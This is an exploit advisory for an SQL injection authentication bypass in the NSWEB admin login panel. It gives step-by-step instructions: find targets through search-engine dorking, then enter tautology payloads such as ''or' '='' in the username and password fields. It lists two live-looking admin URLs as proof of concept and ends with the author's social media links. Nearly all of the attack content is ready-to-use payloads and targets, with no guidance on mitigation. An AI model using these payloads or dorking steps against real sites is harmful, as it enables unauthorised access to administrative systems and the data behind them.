==========================================================================================
Exploit Title: NSWEB Admin Login Panel SQL Injection Authentication Bypass
==========================================================================================
Risk: High
==========================================================================================
Author: Ismail Tasdelen
==========================================================================================
Vedor : http://www.nsweb.rs/
==========================================================================================
[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: 'or' '='
[+] Password: 'or' '='
[+] or as the best choice User : ' or true & " or true
==========================================================================================
POC :
==========================================================================================
http://www.nsweb.rs/admin
http://www.nskoncept.rs/admin/
==========================================================================================
# You want to follow my activity ?
==========================================================================================
https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln
==========================================================================================